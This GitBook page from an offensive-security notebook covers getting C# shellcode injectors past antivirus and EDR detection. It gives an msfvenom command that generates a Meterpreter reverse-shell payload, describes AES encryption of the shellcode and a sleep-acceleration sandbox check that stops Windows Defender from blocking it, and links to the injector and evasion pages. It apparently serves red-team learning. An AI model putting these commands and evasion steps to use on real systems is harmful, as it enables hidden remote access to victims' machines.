# Evasion and bypassing detection within C\#

## Overview

AV and EDR bypass techniques for C# assembly payloads.

## Experiment

In this experiment we will be using the NTAPI injector as our baseline.

{% content-ref url="../../execution/c-.net-assembly/process-injection/using-ntapi-undocumented-functions" %}
[using-ntapi-undocumented-functions](https://rfc1918.gitbook.io/offsec/execution/c-.net-assembly/process-injection/using-ntapi-undocumented-functions)
{% endcontent-ref %}

### Msfvenom payload

```bash
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f raw EXITFUNC=thread -o shellcode.bin
```

### Injector without any shellcode

For our baseline we tested the raw injector code without any shellcode in the payload.

<figure><img src="https://1029482190-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVonnsWh96xLbzU5ncJWZ%2Fuploads%2FII1p6bkruOwLI8TlH38d%2Fimage.png?alt=media&#x26;token=664cf3b2-568d-4fa5-9080-b25966d43975" alt=""><figcaption></figcaption></figure>

### Raw Meterpreter payload shellcode

Running the injector with the raw Meterpreter shellcode.

<figure><img src="https://1029482190-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVonnsWh96xLbzU5ncJWZ%2Fuploads%2Fo4LSTBDQ6MqTsOTELxfu%2Fimage.png?alt=media&#x26;token=db4faae7-587e-424d-95b2-25c9e39e057e" alt=""><figcaption></figcaption></figure>

### Using AES encryption

Encrypting the shellcode using AES.

{% content-ref url="evasion-and-bypassing-detection-within-c/encryptors/aes-encryptor" %}
[aes-encryptor](https://rfc1918.gitbook.io/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c/encryptors/aes-encryptor)
{% endcontent-ref %}

<figure><img src="https://1029482190-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVonnsWh96xLbzU5ncJWZ%2Fuploads%2F1n54nEetAe57dgZgyWyc%2Fimage.png?alt=media&#x26;token=0956d73f-fdd6-4152-8f1e-ed1fdf7ea17a" alt=""><figcaption></figcaption></figure>

### Running it twice and Defender is not so nice

Interestingly, when executing it a second time, Defender's behavioral analysis flagged and blocked execution.

Adding a sleep-acceleration check for sandbox detection seems to do the trick: with it in place, the second execution is no longer blocked.

{% content-ref url="evasion-and-bypassing-detection-within-c/sandbox-evasion/time-accelerated-checks" %}
[time-accelerated-checks](https://rfc1918.gitbook.io/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c/sandbox-evasion/time-accelerated-checks)
{% endcontent-ref %}

<figure><img src="https://1029482190-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVonnsWh96xLbzU5ncJWZ%2Fuploads%2FcPn4GUZpVq3dZOKShoJC%2Fimage.png?alt=media&#x26;token=bec1c117-7dd1-4e8b-b950-fe776570864f" alt=""><figcaption></figcaption></figure>

## References

{% content-ref url="../../execution/c-.net-assembly" %}
[c-.net-assembly](https://rfc1918.gitbook.io/offsec/execution/c-.net-assembly)
{% endcontent-ref %}
